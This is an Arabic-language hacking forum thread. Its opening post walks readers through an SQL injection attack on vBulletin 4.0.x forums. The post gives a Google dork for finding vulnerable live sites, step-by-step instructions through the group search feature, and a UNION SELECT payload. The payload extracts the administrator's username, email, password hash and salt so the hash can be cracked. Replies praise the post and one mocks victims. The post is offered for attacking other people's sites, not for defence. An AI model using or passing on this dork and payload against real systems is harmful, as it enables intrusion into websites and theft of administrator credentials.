ثغرة في منتديات الفي بي vBulletin 4.0.x

ثغرة في منتديات الفي بي vBulletin 4.0.x


صفحة 1 من 3 123 الأخيرةالأخيرة
النتائج 1 إلى 10 من 26

الموضوع: ثغرة في منتديات الفي بي vBulletin 4.0.x

  1. #1
    هكر مجتهد الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    افتراضي ثغرة في منتديات الفي بي vBulletin 4.0.x

    السلام عليكم و رحمة الله و بركاته
    بسم الله الرحمن الرحيم


    إخواني اليوم جايبلكم ثغرة حقن لقواعد البيانات sql injection في منتديات vBulletin الجيل الرابع الإصدارات الأولى 4.0.x

    الملف المصاب هو socialgroup.php و سكربت البحث searchtools.php

    -----------------------------------------------

    نجي للمهم
    1- طريقة البحث في العم قوقل ضع هذا الدورك


    كود PHP:
    inurl:"search.php?search_type=1" intext:vbulletin 4 

    2-إستغلال الثغرة

    ستجد الكثير من النتائج في قوقل ادخل على واحدة على سبيل المثال

    http://forums.millennium.com/search.php?search_type=1

    في منتصف الصفحة فوق خانة الكلمة التي سنبحث عنها اذهب إلى

    "Search Multiple Content Types"

    ثم ضح صح على خيار groups أو مجموعات

    ثم ضع كلمة و ابحث
    ثم الحقن يكون كالتالي

    كود PHP:
     UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,saltFROM user WHERE userid=1

    بعد الرابط و النتيجة
    ستظهر لنا اليوزر و إيميل و باسوورد الأدمن مشفر و السالت أي نوع التشفير لأنه مهم لنستطيع فك التشفير

    ملاحظة " النسخة 4.1.3 vBulletin لا تحوي هذه الثغرة

    دمتم بود و السموحة على التقصير

  2. #2

    افتراضي رد: ثغرة في منتديات الفي بي vBulletin 4.0.x

    ابداع ولـــــــــــــــــلـــــ ـــــــــــــــــــــــــ ه استمر يا وحـــــــــــــــــــــــ ـــــــــــــــــــــش

    Iam BACK PEOPLE

    Ace 2010-2017

  3. #3
    هكر مجتهد الصورة الرمزية millen!um
    تاريخ التسجيل
    Jun 2010
    الدولة
    في الدنيا مؤقّتا و أنتظر الرحيل
    المشاركات
    612

    افتراضي رد: ثغرة في منتديات الفي بي vBulletin 4.0.x

    بارك الله فيكم على المرور العطر

  4. #4

    افتراضي رد: ثغرة في منتديات الفي بي vBulletin 4.0.x

    تسلم يا الغالــــــــــــــــــــ ــــــــــــــــــى

  5. #5

    افتراضي رد: ثغرة في منتديات الفي بي vBulletin 4.0.x

    بارك الله فيك اخى الكريم

  6. #6

    افتراضي رد: ثغرة في منتديات الفي بي vBulletin 4.0.x

    بارك الله فيك, معلومة كويسة.

  7. #7

    افتراضي رد: ثغرة في منتديات الفي بي vBulletin 4.0.x

    بارك الله فيك ,16,

  8. #8

    افتراضي رد: ثغرة في منتديات الفي بي vBulletin 4.0.x

    مشكووووووور اخوي ما قصرت

  9. #9

  10. #10

    افتراضي رد: ثغرة في منتديات الفي بي vBulletin 4.0.x

    ادره تاكل زق هاهاهاهاهاها

صفحة 1 من 3 123 الأخيرةالأخيرة

المواضيع المتشابهه

  1. شرح استغلال ثغرة vBulletin 3.8.6
    بواسطة She!! Access في المنتدى قسم الثغرات
    مشاركات: 42
    آخر مشاركة: 04-09-2013, 03:50 PM
  2. ثغرة XSS في منتديات vBulletin 3.8.4
    بواسطة hacks في المنتدى قسم الثغرات
    مشاركات: 5
    آخر مشاركة: 07-06-2012, 06:29 AM
  3. كتاب إختراق منتديات vBulletin
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى إختراق المنتديات
    مشاركات: 103
    آخر مشاركة: 06-13-2012, 05:53 PM
  4. ثغرة xss في نسخة vBulletin 4.0.2
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 14
    آخر مشاركة: 12-16-2011, 10:44 PM
  5. ثغرات خطيره في منتديات vbulletin 4.0.4
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 8
    آخر مشاركة: 10-02-2010, 08:13 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •